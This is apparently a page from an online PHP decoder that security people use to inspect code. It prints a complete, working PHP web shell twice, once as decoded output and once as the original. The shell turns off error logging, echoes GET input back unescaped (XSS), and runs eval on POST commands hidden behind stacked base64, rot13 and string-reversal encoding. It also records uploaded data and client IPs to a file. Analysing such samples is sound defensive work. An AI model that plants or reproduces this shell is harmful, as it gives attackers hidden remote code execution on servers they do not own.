Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

/* * * I found this shell at 2013-02-18 * * This shell disables logging and error rep..

Decoded Output download

/*
 *
 *	I found this shell at 2013-02-18 
 *
 *	This shell disables logging and error reporting and allows for XSS,
 *	command execution (the command is also obfuscated),
 *	and file uploads.
 */
<?php 
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
if (isset($_GET['r'])) {
	print $_GET['r'];
} elseif (isset($_POST['e'])) {
	eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
} elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') {
	$data = file_get_contents('php://input');
	if (strlen($data) > 0)
		print 'STATUS-IMPORT-OK';
	if (strlen($data) > 12) {
		$fp=@fopen('tmpfile','a');
		@flock($fp, LOCK_EX);
		@fputs($fp, $_SERVER['REMOTE_ADDR']."	".base64_encode($data)."
");
		@flock($fp, LOCK_UN);
		@fclose($fp);
	}
} exit;
?>

Did this file decode correctly?

Original Code

/*
 *
 *	I found this shell at 2013-02-18 
 *
 *	This shell disables logging and error reporting and allows for XSS,
 *	command execution (the command is also obfuscated),
 *	and file uploads.
 */
<?php 
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
if (isset($_GET['r'])) {
	print $_GET['r'];
} elseif (isset($_POST['e'])) {
	eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
} elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') {
	$data = file_get_contents('php://input');
	if (strlen($data) > 0)
		print 'STATUS-IMPORT-OK';
	if (strlen($data) > 12) {
		$fp=@fopen('tmpfile','a');
		@flock($fp, LOCK_EX);
		@fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n");
		@flock($fp, LOCK_UN);
		@fclose($fp);
	}
} exit;
?>

Function Calls

ini_set 3
error_reporting 1

Variables

None

Stats

MD5 a2ddd490769e7b88cc71861e505684ee
Eval Count 0
Decode Time 92 ms